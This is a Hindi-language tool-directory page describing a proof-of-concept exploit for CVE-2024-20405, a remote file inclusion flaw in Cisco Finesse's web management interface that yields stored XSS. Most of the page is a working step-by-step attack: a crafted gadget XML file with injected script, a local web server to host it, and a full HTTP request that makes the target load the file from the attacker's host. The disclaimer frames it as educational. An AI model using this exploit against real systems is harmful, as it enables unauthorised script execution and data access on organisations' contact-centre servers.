Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-20405 — CVE-2024-20405 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो वेब-आधारित प्रबंधन इंटरफ़ेस में RFI के माध्यम से Cisco Finesse में संग्रहीत XSS प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/3zz4t/cve-2024-20405
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub3zz4t/cve-2024-20405

CVE-2024-20405

CVE-2024-20405 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो वेब-आधारित प्रबंधन इंटरफ़ेस में RFI के माध्यम से Cisco Finesse में संग्रहीत XSS प्रदर्शित करता है।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

सिस्को फिनेस के वेब-आधारित प्रबंधन इंटरफेस में एक कमजोरी एक अनप्रमाणित, दूरस्थ हमलावर को RFI कमजोरी का शोषण करके संग्रहीत XSS हमला करने की अनुमति दे सकती है। यह कमजोरी प्रभावित उपकरण पर भेजे गए विशिष्ट HTTP अनुरोधों के लिए उपयोगकर्ता द्वारा प्रदत्त इनपुट के अपर्याप्त सत्यापन के कारण होती है। एक हमलावर उपयोगकर्ता को एक तैयार लिंक पर क्लिक करने के लिए राजी करके इस कमजोरी का शोषण कर सकता है। सफल शोषण हमलावर को प्रभावित इंटरफेस के संदर्भ में मनमाना स्क्रिप्ट कोड निष्पादित करने या प्रभावित उपकरण पर संवेदनशील जानकारी तक पहुंचने की अनुमति दे सकता है।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

  1. एक पूर्ण पथ बनाएं जो मूल योजना के समान पथ से मेल खाता हो।
root@kitploit:~
mkdir cuicui && mkdir cuicui/gadget && mkdir cuicui/gadget/LiveData

  1. एक कॉन्फ़िगरेशन फ़ाइल "LiveDataGadget.xml" बनाएं जिसमें दुर्भावनापूर्ण कोड हो जो फ़ाइल कॉल किए जाने पर चले।
root@kitploit:~
nano cuicui/gadget/LiveData/LiveDataGadget.xml
root@kitploit:~
<?xml version="1.0" encoding="UTF-8" ?>

<Module>

<ModulePrefs title="__MSG_default_gadget_title__" height="0" >
    <Require feature="pubsub-2" />
    <Require feature="settitle" />
    <Require feature="setprefs" />
    <Require feature="dynamic-height" />
    <Require feature="views" />
    <Optional feature="content-rewrite">
        <!-- these files will be directly served by cuic, not through shindig -->
        <Param name="exclude-url">cuicui/gadget/report-gadget.min.js</Param>
        <Param name="exclude-url">cuicui/gadget/report-gadget.min.css</Param>
        <Param name="exclude-url">desktop/assets/js/finesse.min.js</Param>
        <Param name="exclude-url">desktop/scripts/js/ccbu-third-party.min.js</Param>
      <Param name="exclude-url">desktop/scripts/fonts/Cisco_Toolkit_Icons.woff</Param>
      <Param name="exclude-url">desktop/scripts/fonts/CiscoSansTTRegular.woff</Param>
      <Param name="exclude-url">desktop/scripts/fonts/Cisco_Toolkit_Icons.woff2</Param>
      <Param name="exclude-url">desktop/scripts/fonts/Cisco_Toolkit_Icons.eot</Param>
    </Optional>
   
</ModulePrefs>

    <UserPref name="scheme" display_name="scheme" default_value=""/>
    <UserPref name="host" display_name="host" default_value=""/>
    <UserPref name="hostPort" display_name="hostPort" default_value=""/>

  <Content type="html" view="default,canvas">
   
    <![CDATA[
    <!DOCTYPE html>
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta charset="UTF-8" />
        <script type="text/javascript">
            alert("From RFI To XSS")
        </script>
    </head>

    <body class="claro" >
    <h1>Cisco Finesse v12.6</h1>
    </body>
    ]]>
  </Content>
</Module>

  1. दुर्भावनापूर्ण कॉन्फ़िगरेशन फ़ाइल "LiveDataGadget.xml" को होस्ट करने के लिए एक स्थानीय वेब सर्वर चलाएं।
root@kitploit:~
python3 -m http.server <port>

  1. अपने स्थानीय वेब सर्वर से दुर्भावनापूर्ण कॉन्फ़िगरेशन फ़ाइल शामिल करने के लिए नीचे दिया गया अनुरोध भेजें, अपने <target>, <IP> और <port> को बदलने के बाद।
root@kitploit:~
GET /gadgets/ifr?container=default&mid=0&nocache=0&country=US&lang=en&view=default&refresh=86400&up_id=6000&up_order=14&up_urlPrefs=%7B%22gadgetHeight%22%3A%22280%22%2C%22viewId%22%3A%2256BC5CCE8C37467EA4D4EFA8371258BC%22%2C%22filterId%22%3A%22agentStateLog.id%3DCL%20teamName%22%2C%22scheme%22%3A%22https%22%2C%22hostname%22%3A%22cuica.<target>%22%2C%22port%22%3A%228444%22%7D&up_country=US&up_language=en&up_locale=en_US&up_host=<target>&up_hostPort=8445&up_extension=<extension>&up_xmppDomain=<target>&up_pubsubDomain=pubsub.<target>&up_restHost=<target>&up_mobileAgentMode=undefined&up_mobileAgentDialNumber=undefined&up_scheme=https&up_localhostFQDN=<target>&up_localhostPort=8082&up_teamId=1&up_teamName=Default&up_systemAuthMode=NON_SSO&up_compatibilityMode=false&up_toasterNotificationTimeout=8&up_navItemRoute=%23%2FmyHistory&up_speechRecognitionHighlights=problem%2C%20solution%2C%20defect%2C%20issue%2C%20summary%2C%20glitch%2C%20resolved%2C%20resolution&up_cceSkillTargetId=5515&up_enableDropParticipantFor=supervisor_only&up_dropParticipant=agents&up_CCDContainer=true&up_externalServerHost=https%3A%2F%2F<target>%3A8445&up_deploymentType=UCCE&up_peripheralId=5000&up_messages=%7B%22select.agent.message%22%3A%22Select%20an%20Agent%20from%20Team%20Performance%20Gadget%22%7D&up_gadgetInfo=undefined&st=john.doe:john.doe:appid:cont:url:0:default&url=http%3A%2F%2F<IP>%3A<port>%2Fcuicui%2Fgadget%2FLiveData%2FLiveDataGadget.xml%3FgadgetHeight%3D280%26viewId%3D56BC5CCE8C37467EA4D4EFA8371258BC%26filterId%3DagentStateLog.id%3DCL%2520teamName HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695819521188; timeBeforeAttemptingLoginInIframe=1695819523191; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695810942373
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container/?locale=en_US&fromlogout=true
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers

  1. अनुरोध भेजने के बाद, आपको वेब सर्वर से दूरस्थ दुर्भावनापूर्ण कॉन्फ़िगरेशन फ़ाइल शामिल करने के लिए एक HTTP अनुरोध प्राप्त होगा।

  1. कॉन्फ़िगरेशन फ़ाइल शामिल करने के बाद दुर्भावनापूर्ण कोड चलाया गया।

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2024-20405
  • https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew

अस्वीकरण

यह केवल एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है जो यह प्रदर्शित करने के लिए है कि सिस्को फिनेस का वेब-आधारित प्रबंधन इंटरफेस रिमोट फ़ाइल इन्क्लूज़न (RFI) के प्रति संवेदनशील है, और यह PoC केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनके परीक्षण की स्पष्ट अनुमति हो। इस PoC का दुरुपयोग गंभीर परिणाम दे सकता है।

टूल डाउनलोड करें